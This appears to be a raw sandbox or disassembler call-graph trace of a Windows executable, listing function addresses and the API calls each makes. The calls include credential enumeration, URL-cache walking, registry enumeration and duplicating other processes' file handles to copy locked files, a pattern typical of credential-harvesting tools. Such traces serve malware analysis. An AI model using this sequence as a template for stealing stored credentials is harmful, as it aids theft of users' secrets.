409d1f 6 API calls 38829->38839 38840 409d1f 6 API calls 38830->38840 38831 445879 38831->38810 38850 4087b3 338 API calls 38831->38850 39215 409d1f wcslen wcslen 38833->39215 38844 40b2cc 27 API calls 38835->38844 38836 445d3d 38864 40b2cc 27 API calls 38836->38864 38837 445d88 memset memset memset 38847 414c2e 16 API calls 38837->38847 39267 409b98 GetFileAttributesW 38838->39267 38848 4459bc 38839->38848 38849 445ce1 38840->38849 38841 445bb3 39341 445403 memset 38841->39341 38842 445680 38842->38821 39086 4087b3 memset 38842->39086 38853 445bf3 38844->38853 38846->38828 38856 445dde 38847->38856 39334 409b98 GetFileAttributesW 38848->39334 39358 409b98 GetFileAttributesW 38849->39358 38850->38831 38863 409d1f 6 API calls 38853->38863 38854 445928 38854->38783 39268 40b6ef 38854->39268 38865 40b2cc 27 API calls 38856->38865 38858 4459cb 38858->38786 38875 40b6ef 252 API calls 38858->38875 38862 40b2cc 27 API calls 38868 445a94 38862->38868 38870 445c07 38863->38870 38871 445d54 _wcsicmp 38864->38871 38874 445def 38865->38874 38866->38825 38866->38836 38866->38837 38867 445389 258 API calls 38867->38798 39220 40ae18 38868->39220 38869 44566d 38869->38916 39137 413d4c 38869->39137 38878 445389 258 API calls 38870->38878 38879 445d71 38871->38879 38942 445d67 38871->38942 38873 445665 39252 40b1ab free free 38873->39252 38880 409d1f 6 API calls 38874->38880 38875->38786 38883 445c17 38878->38883 39359 445093 23 API calls 38879->39359 38886 445e03 38880->38886 38882 4456d8 38888 40b2cc 27 API calls 38882->38888 38889 40b2cc 27 API calls 38883->38889 38885 44563c 38885->38873 38891 4087b3 338 API calls 38885->38891 39360 409b98 GetFileAttributesW 38886->39360 38887 40b6ef 252 API calls 38887->38825 38893 4456e2 38888->38893 38894 445c23 38889->38894 38890 445d83 38890->38825 38891->38885 39254 413fa6 _wcsicmp _wcsicmp 38893->39254 38898 409d1f 6 API calls 38894->38898 38896 445e12 38899 445e6b 38896->38899 38903 40b2cc 27 API calls 38896->38903 38901 445c37 38898->38901 39362 445093 23 API calls 38899->39362 38900 4456eb 38906 4456fd memset memset memset memset 38900->38906 38907 4457ea 38900->38907 38908 445389 258 API calls 38901->38908 38902 445b17 39335 40aebe 38902->39335 38910 445e33 38903->38910 39255 409c70 wcscpy wcsrchr 38906->39255 39258 413d29 38907->39258 38914 445c47 38908->38914 38915 409d1f 6 API calls 38910->38915 38912 445e7e 38917 445f67 38912->38917 38920 40b2cc 27 API calls 38914->38920 38921 445e47 38915->38921 38916->38780 39154 403e2d memset memset memset memset memset 38916->39154 38922 40b2cc 27 API calls 38917->38922 38918 445ab2 memset 38923 40b2cc 27 API calls 38918->38923 38925 445c53 38920->38925 39361 409b98 GetFileAttributesW 38921->39361 38927 445f73 38922->38927 38928 445aa1 38923->38928 38924 409c70 2 API calls 38929 44577e 38924->38929 38930 409d1f 6 API calls 38925->38930 38932 409d1f 6 API calls 38927->38932 38928->38902 38928->38918 38933 409d1f 6 API calls 38928->38933 39227 40add4 38928->39227 39232 445389 38928->39232 39241 40ae51 38928->39241 38934 409c70 2 API calls 38929->38934 38935 445c67 38930->38935 38931 445e56 38931->38899 38939 445e83 memset 38931->38939 38936 445f87 38932->38936 38933->38928 38937 44578d 38934->38937 38938 445389 258 API calls 38935->38938 39365 409b98 GetFileAttributesW 38936->39365 38937->38907 38944 40b2cc 27 API calls 38937->38944 38938->38798 38943 40b2cc 27 API calls 38939->38943 38942->38825 38942->38887 38945 445eab 38943->38945 38946 4457a8 38944->38946 38947 409d1f 6 API calls 38945->38947 38948 409d1f 6 API calls 38946->38948 38950 445ebf 38947->38950 38949 4457b8 38948->38949 39257 409b98 GetFileAttributesW 38949->39257 38952 40ae18 9 API calls 38950->38952 38956 445ef5 38952->38956 38953 4457c7 38953->38907 38955 4087b3 338 API calls 38953->38955 38954 40ae51 9 API calls 38954->38956 38955->38907 38956->38954 38957 445f5c 38956->38957 38959 40add4 2 API calls 38956->38959 38960 40b2cc 27 API calls 38956->38960 38961 409d1f 6 API calls 38956->38961 38963 445f3a 38956->38963 39363 409b98 GetFileAttributesW 38956->39363 38958 40aebe FindClose 38957->38958 38958->38917 38959->38956 38960->38956 38961->38956 39364 445093 23 API calls 38963->39364 38965->38762 38966->38764 38967->38762 38968->38757 38970 40c775 38969->38970 39366 40b1ab free free 38970->39366 38972 40c788 39367 40b1ab free free 38972->39367 38974 40c790 39368 40b1ab free free 38974->39368 38976 40c798 38977 40aa04 free 38976->38977 38978 40c7a0 38977->38978 39369 40c274 memset 38978->39369 38983 40a8ab 9 API calls 38984 40c7c3 38983->38984 38985 40a8ab 9 API calls 38984->38985 38986 40c7d0 38985->38986 39398 40c3c3 38986->39398 38990 40c877 38999 40bdb0 38990->38999 38991 40c86c 39440 4053fe 39 API calls 38991->39440 38997 40c7e5 38997->38990 38997->38991 38998 40c634 49 API calls 38997->38998 39423 40a706 38997->39423 38998->38997 39608 404363 38999->39608 39002 40bf5d 39628 40440c 39002->39628 39004 40bdee 39004->39002 39007 40b2cc 27 API calls 39004->39007 39005 40bddf CredEnumerateW 39005->39004 39008 40be02 wcslen 39007->39008 39008->39002 39018 40be1e 39008->39018 39009 40be26 wcsncmp 39009->39018 39012 40be7d memset 39013 40bea7 memcpy 39012->39013 39012->39018 39014 40bf11 wcschr 39013->39014 39013->39018 39014->39018 39015 40b2cc 27 API calls 39016 40bef6 _wcsnicmp 39015->39016 39016->39014 39016->39018 39017 40bf43 LocalFree 39017->39018 39018->39002 39018->39009 39018->39012 39018->39013 39018->39014 39018->39015 39018->39017 39631 40bd5d 28 API calls 39018->39631 39632 404423 39018->39632 39019 4135f7 39645 4135e0 39019->39645 39022 40b2cc 27 API calls 39023 41360d 39022->39023 39024 40a804 8 API calls 39023->39024 39025 413613 39024->39025 39053 40399d 39052->39053 39674 403a16 39053->39674 39056 403a12 wcsrchr 39056->38788 39059 4039a3 39060 4039f4 39059->39060 39062 403a09 39059->39062 39685 40a02c CreateFileW 39059->39685 39061 4099c6 2 API calls 39060->39061 39060->39062 39061->39062 39688 40b1ab free free 39062->39688 39064 414c2e 16 API calls 39063->39064 39065 404048 39064->39065 39066 414c2e 16 API calls 39065->39066 39067 404056 39066->39067 39068 409d1f 6 API calls 39067->39068 39069 404073 39068->39069 39070 409d1f 6 API calls 39069->39070 39071 40408e 39070->39071 39072 409d1f 6 API calls 39071->39072 39073 4040a6 39072->39073 39074 403af5 20 API calls 39073->39074 39075 4040ba 39074->39075 39076 403af5 20 API calls 39075->39076 39077 4040cb 39076->39077 39715 40414f memset 39077->39715 39079 404140 39729 40b1ab free free 39079->39729 39080 4040ec memset 39084 4040e0 39080->39084 39082 404148 39082->38842 39083 4099c6 2 API calls 39083->39084 39084->39079 39084->39080 39084->39083 39085 40a8ab 9 API calls 39084->39085 39085->39084 39742 40a6e6 WideCharToMultiByte 39086->39742 39088 4087ed 39743 4095d9 memset 39088->39743 39138 40b633 free 39137->39138 39139 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39138->39139 39140 413f00 Process32NextW 39139->39140 39141 413da5 OpenProcess 39140->39141 39142 413f17 CloseHandle 39140->39142 39143 413eb0 39141->39143 39144 413df3 memset 39141->39144 39142->38882 39143->39140 39146 413ebf free 39143->39146 39147 4099f4 3 API calls 39143->39147 39981 413f27 39144->39981 39146->39143 39147->39143 39149 413e37 GetModuleHandleW 39150 413e1f 39149->39150 39151 413e46 GetProcAddress 39149->39151 39150->39149 39986 413959 39150->39986 40002 413ca4 39150->40002 39151->39150 39153 413ea2 CloseHandle 39153->39143 39155 414c2e 16 API calls 39154->39155 39156 403eb7 39155->39156 39157 414c2e 16 API calls 39156->39157 39158 403ec5 39157->39158 39159 409d1f 6 API calls 39158->39159 39160 403ee2 39159->39160 39161 409d1f 6 API calls 39160->39161 39162 403efd 39161->39162 39163 409d1f 6 API calls 39162->39163 39164 403f15 39163->39164 39165 403af5 20 API calls 39164->39165 39166 403f29 39165->39166 39167 403af5 20 API calls 39166->39167 39168 403f3a 39167->39168 39169 40414f 33 API calls 39168->39169 39175 403f4f 39169->39175 39170 403faf 40016 40b1ab free free 39170->40016 39172 403f5b memset 39172->39175 39173 403fb7 39173->38828 39174 4099c6 2 API calls 39174->39175 39175->39170 39175->39172 39175->39174 39176 40a8ab 9 API calls 39175->39176 39176->39175 39178 414c2e 16 API calls 39177->39178 39179 403d26 39178->39179 39180 414c2e 16 API calls 39179->39180 39181 403d34 39180->39181 39182 409d1f 6 API calls 39181->39182 39183 403d51 39182->39183 39184 409d1f 6 API calls 39183->39184 39185 403d6c 39184->39185 39186 409d1f 6 API calls 39185->39186 39187 403d84 39186->39187 39188 403af5 20 API calls 39187->39188 39189 403d98 39188->39189 39190 403af5 20 API calls 39189->39190 39191 403da9 39190->39191 39192 40414f 33 API calls 39191->39192 39198 403dbe 39192->39198 39193 403e1e 40017 40b1ab free free 39193->40017 39194 403dca memset 39194->39198 39196 403e26 39196->38831 39197 4099c6 2 API calls 39197->39198 39198->39193 39198->39194 39198->39197 39199 40a8ab 9 API calls 39198->39199 39199->39198 39201 414b81 9 API calls 39200->39201 39202 414c40 39201->39202 39203 414c73 memset 39202->39203 40018 409cea 39202->40018 39207 414c94 39203->39207 39206 414c64 39206->38823 40021 414592 RegOpenKeyExW 39207->40021 39209 414cc1 39210 414cf4 wcscpy 39209->39210 40022 414bb0 wcscpy 39209->40022 39210->39206 39212 414cd2 40023 4145ac RegQueryValueExW 39212->40023 39214 414ce9 RegCloseKey 39214->39210 39216 409d43 wcscpy 39215->39216 39218 409d62 39215->39218 39217 409719 2 API calls 39216->39217 39219 409d51 wcscat 39217->39219 39218->38862 39219->39218 39221 40aebe FindClose 39220->39221 39222 40ae21 39221->39222 39223 4099c6 2 API calls 39222->39223 39224 40ae35 39223->39224 39225 409d1f 6 API calls 39224->39225 39226 40ae49 39225->39226 39226->38928 39228 40ade0 39227->39228 39229 40ae0f 39227->39229 39228->39229 39230 40ade7 wcscmp 39228->39230 39229->38928 39230->39229 39231 40adfe wcscmp 39230->39231 39231->39229 39233 40ae18 9 API calls 39232->39233 39239 4453c4 39233->39239 39234 40ae51 9 API calls 39234->39239 39235 4453f3 39236 40aebe FindClose 39235->39236 39238 4453fe 39236->39238 39237 40add4 2 API calls 39237->39239 39238->38928 39239->39234 39239->39235 39239->39237 39240 445403 253 API calls 39239->39240 39240->39239 39242 40ae7b FindNextFileW 39241->39242 39243 40ae5c FindFirstFileW 39241->39243 39244 40ae8f 39242->39244 39245 40ae94 39242->39245 39243->39245 39246 40aebe FindClose 39244->39246 39247 40aeb6 39245->39247 39248 409d1f 6 API calls 39245->39248 39246->39245 39247->38928 39248->39247 39251->38885 39252->38869 39253->38869 39254->38900 39256 409c89 39255->39256 39256->38924 39257->38953 39259 413d39 39258->39259 39260 413d2f FreeLibrary 39258->39260 39261 40b633 free 39259->39261 39260->39259 39262 413d42 39261->39262 39263 40b633 free 39262->39263 39264 413d4a 39263->39264 39264->38916 39265->38780 39266->38781 39267->38854 39269 44db70 39268->39269 39270 40b6fc memset 39269->39270 39271 409c70 2 API calls 39270->39271 39272 40b732 wcsrchr 39271->39272 39273 40b743 39272->39273 39274 40b746 memset 39272->39274 39273->39274 39275 40b2cc 27 API calls 39274->39275 39276 40b76f 39275->39276 39277 409d1f 6 API calls 39276->39277 39278 40b783 39277->39278 40024 409b98 GetFileAttributesW 39278->40024 39280 40b792 39281 409c70 2 API calls 39280->39281 39295 40b7c2 39280->39295 39283 40b7a5 39281->39283 39285 40b2cc 27 API calls 39283->39285 39289 40b7b2 39285->39289 39286 40b837 CloseHandle 39288 40b83e memset 39286->39288 39287 40b817 40059 409a45 GetTempPathW 39287->40059 40058 40a6e6 WideCharToMultiByte 39288->40058 39293 409d1f 6 API calls 39289->39293 39291 40b827 CopyFileW 39291->39288 39293->39295 39294 40b866 39296 444432 121 API calls 39294->39296 40025 40bb98 39295->40025 39297 40b879 39296->39297 39298 40bad5 39297->39298 39299 40b273 27 API calls 39297->39299 39300 40baeb 39298->39300 39301 40bade DeleteFileW 39298->39301 39302 40b89a 39299->39302 39303 40b04b ??3@YAXPAX 39300->39303 39301->39300 39304 438552 134 API calls 39302->39304 39305 40baf3 39303->39305 39306 40b8a4 39304->39306 39305->38783 39307 40bacd 39306->39307 39309 4251c4 137 API calls 39306->39309 39308 443d90 111 API calls 39307->39308 39308->39298 39332 40b8b8 39309->39332 39310 40bac6 40071 424f26 123 API calls 39310->40071 39311 40b8bd memset 40062 425413 17 API calls 39311->40062 39314 425413 17 API calls 39314->39332 39317 40a71b MultiByteToWideChar 39317->39332 39318 40a734 MultiByteToWideChar 39318->39332 39321 40b9b5 memcmp 39321->39332 39322 4099c6 2 API calls 39322->39332 39323 404423 37 API calls 39323->39332 39326 40bb3e memset memcpy 40072 40a734 MultiByteToWideChar 39326->40072 39327 4251c4 137 API calls 39327->39332 39329 40bb88 LocalFree 39329->39332 39332->39310 39332->39311 39332->39314 39332->39317 39332->39318 39332->39321 39332->39322 39332->39323 39332->39326 39332->39327 39333 40ba5f memcmp 39332->39333 40063 4253ef 16 API calls 39332->40063 40064 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39332->40064 40065 4253af 17 API calls 39332->40065 40066 4253cf 17 API calls 39332->40066 40067 447280 memset 39332->40067 40068 447960 memset memcpy memcpy memcpy 39332->40068 40069 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39332->40069 40070 447920 memcpy memcpy memcpy 39332->40070 39333->39332 39334->38858 39336 40aed1 39335->39336 39337 40aec7 FindClose 39335->39337 39336->38793 39337->39336 39339 4099d7 39338->39339 39340 4099da memcpy 39338->39340 39339->39340 39340->38841 39342 40b2cc 27 API calls 39341->39342 39343 44543f 39342->39343 39344 409d1f 6 API calls 39343->39344 39345 44544f 39344->39345 40159 409b98 GetFileAttributesW 39345->40159 39347 445476 39350 40b2cc 27 API calls 39347->39350 39348 44545e 39348->39347 39349 40b6ef 252 API calls 39348->39349 39349->39347 39351 445482 39350->39351 39352 409d1f 6 API calls 39351->39352 39353 445492 39352->39353 40160 409b98 GetFileAttributesW 39353->40160 39355 4454a1 39356 4454b9 39355->39356 39357 40b6ef 252 API calls 39355->39357 39356->38867 39357->39356 39358->38866 39359->38890 39360->38896 39361->38931 39362->38912 39363->38956 39364->38956 39365->38942 39366->38972 39367->38974 39368->38976 39370 414c2e 16 API calls 39369->39370 39371 40c2ae 39370->39371 39441 40c1d3 39371->39441 39376 40c3be 39393 40a8ab 39376->39393 39377 40afcf 2 API calls 39378 40c2fd FindFirstUrlCacheEntryW 39377->39378 39379 40c3b6 39378->39379 39380 40c31e wcschr 39378->39380 39381 40b04b ??3@YAXPAX 39379->39381 39382 40c331 39380->39382 39383 40c35e FindNextUrlCacheEntryW 39380->39383 39381->39376 39384 40a8ab 9 API calls 39382->39384 39383->39380 39385 40c373 GetLastError 39383->39385 39388 40c33e wcschr 39384->39388 39386 40c3ad FindCloseUrlCache 39385->39386 39387 40c37e 39385->39387 39386->39379 39389 40afcf 2 API calls 39387->39389 39388->39383 39390 40c34f 39388->39390 39391 40c391 FindNextUrlCacheEntryW 39389->39391 39392 40a8ab 9 API calls 39390->39392 39391->39380 39391->39386 39392->39383 39535 40a97a 39393->39535 39396 40a8cc 39396->38983 39397 40a8d0 7 API calls 39397->39396 39540 40b1ab free free 39398->39540 39400 40c3dd 39401 40b2cc 27 API calls 39400->39401 39402 40c3e7 39401->39402 39541 414592 RegOpenKeyExW 39402->39541 39404 40c3f4 39405 40c50e 39404->39405 39406 40c3ff 39404->39406 39420 405337 39405->39420 39407 40a9ce 4 API calls 39406->39407 39408 40c418 memset 39407->39408 39542 40aa1d 39408->39542 39411 40c471 39413 40c47a _wcsupr 39411->39413 39412 40c505 RegCloseKey 39412->39405 39414 40a8d0 7 API calls 39413->39414 39415 40c498 39414->39415 39416 40a8d0 7 API calls 39415->39416 39417 40c4ac memset 39416->39417 39418 40aa1d 39417->39418 39419 40c4e4 RegEnumValueW 39418->39419 39419->39412 39419->39413 39544 405220 39420->39544 39424 4099c6 2 API calls 39423->39424 39425 40a714 _wcslwr 39424->39425 39426 40c634 39425->39426 39601 405361 39426->39601 39429 40c65c wcslen 39604 4053b6 39 API calls 39429->39604 39430 40c71d wcslen 39430->38997 39432 40c677 39433 40c713 39432->39433 39605 40538b 39 API calls 39432->39605 39607 4053df 39 API calls 39433->39607 39436 40c6a5 39436->39433 39437 40c6a9 memset 39436->39437 39438 40c6d3 39437->39438 39606 40c589 43 API calls 39438->39606 39440->38990 39442 40ae18 9 API calls 39441->39442 39448 40c210 39442->39448 39443 40ae51 9 API calls 39443->39448 39444 40c264 39445 40aebe FindClose 39444->39445 39447 40c26f 39445->39447 39446 40add4 2 API calls 39446->39448 39453 40e5ed memset memset 39447->39453 39448->39443 39448->39444 39448->39446 39449 40c231 _wcsicmp 39448->39449 39450 40c1d3 35 API calls 39448->39450 39449->39448 39451 40c248 39449->39451 39450->39448 39466 40c084 22 API calls 39451->39466 39454 414c2e 16 API calls 39453->39454 39455 40e63f 39454->39455 39456 409d1f 6 API calls 39455->39456 39457 40e658 39456->39457 39467 409b98 GetFileAttributesW 39457->39467 39459 40e667 39460 40e680 39459->39460 39461 409d1f 6 API calls 39459->39461 39468 409b98 GetFileAttributesW 39460->39468 39461->39460 39463 40e68f 39465 40c2d8 39463->39465 39469 40e4b2 39463->39469 39465->39376 39465->39377 39466->39448 39467->39459 39468->39463 39490 40e01e 39469->39490 39471 40e593 39472 40e5b0 39471->39472 39473 40e59c DeleteFileW 39471->39473 39475 40b04b ??3@YAXPAX 39472->39475 39473->39472 39474 40e521 39474->39471 39513 40e175 39474->39513 39476 40e5bb 39475->39476 39478 40e5c4 CloseHandle 39476->39478 39479 40e5cc 39476->39479 39478->39479 39481 40b633 free 39479->39481 39480 40e573 39483 40e584 39480->39483 39484 40e57c CloseHandle 39480->39484 39482 40e5db 39481->39482 39486 40b633 free 39482->39486 39534 40b1ab free free 39483->39534 39484->39483 39485 40e540 39485->39480 39533 40e2ab 30 API calls 39485->39533 39488 40e5e3 39486->39488 39488->39465 39491 406214 22 API calls 39490->39491 39492 40e03c 39491->39492 39493 40e16b 39492->39493 39494 40dd85 74 API calls 39492->39494 39493->39474 39495 40e06b 39494->39495 39495->39493 39496 40afcf ??2@YAPAXI ??3@YAXPAX 39495->39496 39497 40e08d OpenProcess 39496->39497 39498 40e0a4 GetCurrentProcess DuplicateHandle 39497->39498 39502 40e152 39497->39502 39499 40e0d0 GetFileSize 39498->39499 39500 40e14a CloseHandle 39498->39500 39503 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39499->39503 39500->39502 39501 40e160 39505 40b04b ??3@YAXPAX 39501->39505 39502->39501 39504 406214 22 API calls 39502->39504 39506 40e0ea 39503->39506 39504->39501 39505->39493 39507 4096dc CreateFileW 39506->39507 39508 40e0f1 CreateFileMappingW 39507->39508 39509 40e140 CloseHandle CloseHandle 39508->39509 39510 40e10b MapViewOfFile 39508->39510 39509->39500 39511 40e13b CloseHandle 39510->39511 39512 40e11f WriteFile UnmapViewOfFile 39510->39512 39511->39509 39512->39511 39514 40e18c 39513->39514 39515 406b90 11 API calls 39514->39515 39516 40e19f 39515->39516 39517 40e1a7 memset 39516->39517 39518 40e299 39516->39518 39523 40e1e8 39517->39523 39519 4069a3 ??3@YAXPAX free 39518->39519 39520 40e2a4 39519->39520 39520->39485 39521 406e8f 13 API calls 39521->39523 39522 406b53 SetFilePointerEx ReadFile 39522->39523 39523->39521 39523->39522 39524 40e283 39523->39524 39525 40dd50 _wcsicmp 39523->39525 39529 40742e 8 API calls 39523->39529 39530 40aae3 wcslen wcslen _memicmp 39523->39530 39531 40e244 _snwprintf 39523->39531 39526 40e291 39524->39526 39527 40e288 free 39524->39527 39525->39523 39528 40aa04 free 39526->39528 39527->39526 39528->39518 39529->39523 39530->39523 39532 40a8d0 7 API calls 39531->39532 39532->39523 39533->39485 39534->39471 39537 40a980 39535->39537 39536 40a8bb 39536->39396 39536->39397 39537->39536 39538 40a995 _wcsicmp 39537->39538 39539 40a99c wcscmp 39537->39539 39538->39537 39539->39537 39540->39400 39541->39404 39543 40aa23 RegEnumValueW 39542->39543 39543->39411 39543->39412 39545 405335 39544->39545 39546 40522a 39544->39546 39545->38997 39547 40b2cc 27 API calls 39546->39547 39548 405234 39547->39548 39549 40a804 8 API calls 39548->39549 39550 40523a 39549->39550 39589 40b273 39550->39589 39552 405248 _mbscpy _mbscat GetProcAddress 39553 40b273 27 API calls 39552->39553 39554 405279 39553->39554 39592 405211 GetProcAddress 39554->39592 39556 405282 39557 40b273 27 API calls 39556->39557 39558 40528f 39557->39558 39593 405211 GetProcAddress 39558->39593 39560 405298 39561 40b273 27 API calls 39560->39561 39562 4052a5 39561->39562 39590 40b58d 27 API calls 39589->39590 39591 40b18c 39590->39591 39591->39552 39592->39556 39593->39560 39602 405220 39 API calls 39601->39602 39603 405369 39602->39603 39603->39429 39603->39430 39604->39432 39605->39436 39606->39433 39607->39430 39609 40440c FreeLibrary 39608->39609 39610 40436d 39609->39610 39611 40a804 8 API calls 39610->39611 39612 404377 39611->39612 39613 404383 39612->39613 39614 404405 39612->39614 39615 40b273 27 API calls 39613->39615 39614->39002 39614->39004 39614->39005 39616 40438d GetProcAddress 39615->39616 39617 40b273 27 API calls 39616->39617 39618 4043a7 GetProcAddress 39617->39618 39619 40b273 27 API calls 39618->39619 39620 4043ba GetProcAddress 39619->39620 39621 40b273 27 API calls 39620->39621 39622 4043ce GetProcAddress 39621->39622 39623 40b273 27 API calls 39622->39623 39629 404413 FreeLibrary 39628->39629 39630 40441e 39628->39630 39629->39630 39630->39019 39631->39018 39633 40442e 39632->39633 39635 40447e 39632->39635 39634 40b2cc 27 API calls 39633->39634 39636 404438 39634->39636 39635->39018 39637 40a804 8 API calls 39636->39637 39646 4135f6 39645->39646 39647 4135eb FreeLibrary 39645->39647 39646->39022 39647->39646 39675 403a29 39674->39675 39689 403bed memset memset 39675->39689 39677 403ae7 39702 40b1ab free free 39677->39702 39678 403a3f memset 39683 403a2f 39678->39683 39680 403aef 39680->39059 39681 409d1f 6 API calls 39681->39683 39682 409b98 GetFileAttributesW 39682->39683 39683->39677 39683->39678 39683->39681 39683->39682 39684 40a8d0 7 API calls 39683->39684 39684->39683 39686 40a051 GetFileTime CloseHandle 39685->39686 39687 4039ca CompareFileTime 39685->39687 39686->39687 39687->39059 39688->39056 39690 414c2e 16 API calls 39689->39690 39691 403c38 39690->39691 39692 409719 2 API calls 39691->39692 39693 403c3f wcscat 39692->39693 39694 414c2e 16 API calls 39693->39694 39695 403c61 39694->39695 39696 409719 2 API calls 39695->39696 39697 403c68 wcscat 39696->39697 39703 403af5 39697->39703 39700 403af5 20 API calls 39701 403c95 39700->39701 39701->39683 39702->39680 39704 403b02 39703->39704 39705 40ae18 9 API calls 39704->39705 39707 403b37 39705->39707 39706 40ae51 9 API calls 39706->39707 39707->39706 39708 403bdb 39707->39708 39709 40add4 wcscmp wcscmp 39707->39709 39712 40ae18 9 API calls 39707->39712 39713 40aebe FindClose 39707->39713 39714 40a8d0 7 API calls 39707->39714 39710 40aebe FindClose 39708->39710 39709->39707 39711 403be6 39710->39711 39711->39700 39712->39707 39713->39707 39714->39707 39716 409d1f 6 API calls 39715->39716 39717 404190 39716->39717 39730 409b98 GetFileAttributesW 39717->39730 39719 40419c 39720 4041a7 6 API calls 39719->39720 39721 40435c 39719->39721 39723 40424f 39720->39723 39721->39084 39723->39721 39724 40425e memset 39723->39724 39726 409d1f 6 API calls 39723->39726 39727 40a8ab 9 API calls 39723->39727 39731 414842 39723->39731 39724->39723 39725 404296 wcscpy 39724->39725 39725->39723 39726->39723 39728 4042b6 memset memset _snwprintf wcscpy 39727->39728 39728->39723 39729->39082 39730->39719 39734 41443e 39731->39734 39733 414866 39733->39723 39735 41444b 39734->39735 39736 414451 39735->39736 39737 4144a3 GetPrivateProfileStringW 39735->39737 39738 414491 39736->39738 39739 414455 wcschr 39736->39739 39737->39733 39741 414495 WritePrivateProfileStringW 39738->39741 39739->39738 39740 414463 _snwprintf 39739->39740 39740->39741 39741->39733 39742->39088 39744 40b2cc 27 API calls 39743->39744 39745 409615 39744->39745 39746 409d1f 6 API calls 39745->39746 39747 409625 39746->39747 39772 409b98 GetFileAttributesW 39747->39772 40008 413f4f 39981->40008 39984 413f37 K32GetModuleFileNameExW 39985 413f4a 39984->39985 39985->39150 39987 413969 wcscpy 39986->39987 39988 41396c wcschr 39986->39988 39991 413a3a 39987->39991 39988->39987 39990 41398e 39988->39990 40013 4097f7 wcslen wcslen _memicmp 39990->40013 39991->39150 39993 41399a 39994 4139a4 memset 39993->39994 39995 4139e6 39993->39995 40014 409dd5 GetWindowsDirectoryW wcscpy 39994->40014 39997 413a31 wcscpy 39995->39997 39998 4139ec memset 39995->39998 39997->39991 40015 409dd5 GetWindowsDirectoryW wcscpy 39998->40015 39999 4139c9 wcscpy wcscat 39999->39991 40001 413a11 memcpy wcscat 40001->39991 40003 413cb0 GetModuleHandleW 40002->40003 40004 413cda 40002->40004 40003->40004 40005 413cbf GetProcAddress 40003->40005 40006 413ce3 GetProcessTimes 40004->40006 40007 413cf6 40004->40007 40005->40004 40006->39153 40007->39153 40009 413f2f 40008->40009 40010 413f54 40008->40010 40009->39984 40009->39985 40011 40a804 8 API calls 40010->40011 40012 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40011->40012 40012->40009 40013->39993 40014->39999 40015->40001 40016->39173 40017->39196 40019 409cf9 GetVersionExW 40018->40019 40020 409d0a 40018->40020 40019->40020 40020->39203 40020->39206 40021->39209 40022->39212 40023->39214 40024->39280 40026 40bba5 40025->40026 40073 40cc26 40026->40073 40029 40bd4b 40094 40cc0c 40029->40094 40034 40b2cc 27 API calls 40035 40bbef 40034->40035 40101 40ccf0 _wcsicmp 40035->40101 40037 40bbf5 40037->40029 40102 40ccb4 6 API calls 40037->40102 40039 40bc26 40040 40cf04 17 API calls 40039->40040 40041 40bc2e 40040->40041 40042 40bd43 40041->40042 40043 40b2cc 27 API calls 40041->40043 40044 40cc0c 4 API calls 40042->40044 40045 40bc40 40043->40045 40044->40029 40103 40ccf0 _wcsicmp 40045->40103 40047 40bc46 40047->40042 40048 40bc61 memset memset WideCharToMultiByte 40047->40048 40104 40103c strlen 40048->40104 40050 40bcc0 40051 40b273 27 API calls 40050->40051 40052 40bcd0 memcmp 40051->40052 40052->40042 40053 40bce2 40052->40053 40054 404423 37 API calls 40053->40054 40055 40bd10 40054->40055 40055->40042 40056 40bd3a LocalFree 40055->40056 40057 40bd1f memcpy 40055->40057 40056->40042 40057->40056 40058->39294 40060 409a74 GetTempFileNameW 40059->40060 40061 409a66 GetWindowsDirectoryW 40059->40061 40060->39291 40061->40060 40062->39332 40063->39332 40064->39332 40065->39332 40066->39332 40067->39332 40068->39332 40069->39332 40070->39332 40071->39307 40072->39329 40105 4096c3 CreateFileW 40073->40105 40075 40cc34 40076 40cc3d GetFileSize 40075->40076 40077 40bbca 40075->40077 40078 40afcf 2 API calls 40076->40078 40077->40029 40085 40cf04 40077->40085 40079 40cc64 40078->40079 40106 40a2ef ReadFile 40079->40106 40081 40cc71 40107 40ab4a MultiByteToWideChar 40081->40107 40083 40cc95 CloseHandle 40084 40b04b ??3@YAXPAX 40083->40084 40084->40077 40086 40b633 free 40085->40086 40087 40cf14 40086->40087 40113 40b1ab free free 40087->40113 40089 40bbdd 40089->40029 40089->40034 40090 40cf1b 40090->40089 40092 40cfef 40090->40092 40114 40cd4b 40090->40114 40093 40cd4b 14 API calls 40092->40093 40093->40089 40095 40b633 free 40094->40095 40096 40cc15 40095->40096 40097 40aa04 free 40096->40097 40098 40cc1d 40097->40098 40158 40b1ab free free 40098->40158 40100 40b7d4 memset CreateFileW 40100->39286 40100->39287 40101->40037 40102->40039 40103->40047 40104->40050 40105->40075 40106->40081 40108 40ab6b 40107->40108 40112 40ab93 40107->40112 40109 40a9ce 4 API calls 40108->40109 40110 40ab74 40109->40110 40111 40ab7c MultiByteToWideChar 40110->40111 40111->40112 40112->40083 40113->40090 40115 40cd7b 40114->40115 40148 40aa29 6 API calls 40115->40148 40117 40cef5 40118 40aa04 free 40117->40118 40119 40cefd 40118->40119 40119->40090 40120 40cd89 40120->40117 40149 40aa29 6 API calls 40120->40149 40122 40ce1d 40150 40aa29 6 API calls 40122->40150 40124 40ce3e 40125 40ce6a 40124->40125 40151 40abb7 wcslen memmove 40124->40151 40126 40ce9f 40125->40126 40154 40abb7 wcslen memmove 40125->40154 40128 40a8d0 7 API calls 40126->40128 40131 40ceb5 40128->40131 40129 40ce56 40152 40aa71 wcslen 40129->40152 40138 40a8d0 7 API calls 40131->40138 40133 40ce8b 40155 40aa71 wcslen 40133->40155 40134 40ce5e 40153 40abb7 wcslen memmove 40134->40153 40136 40ce93 40156 40abb7 wcslen memmove 40136->40156 40140 40cecb 40138->40140 40157 40d00b malloc memcpy free free 40140->40157 40142 40cedd 40143 40aa04 free 40142->40143 40144 40cee5 40143->40144 40145 40aa04 free 40144->40145 40146 40ceed 40145->40146 40147 40aa04 free 40146->40147 40147->40117 40148->40120 40149->40122 40150->40124 40151->40129 40152->40134 40153->40125 40154->40133 40155->40136 40156->40126 40157->40142 40158->40100 40159->39348 40160->39355 37537 44dea5 37538 44deb5 FreeLibrary 37537->37538 37539 44dec3 37537->37539 37538->37539 40170 4148b6 FindResourceW 40171 4148f9 40170->40171 40172 4148cf SizeofResource 40170->40172 40172->40171 40173 4148e0 LoadResource 40172->40173 40173->40171 40174 4148ee LockResource 40173->40174 40174->40171 37716 415304 free 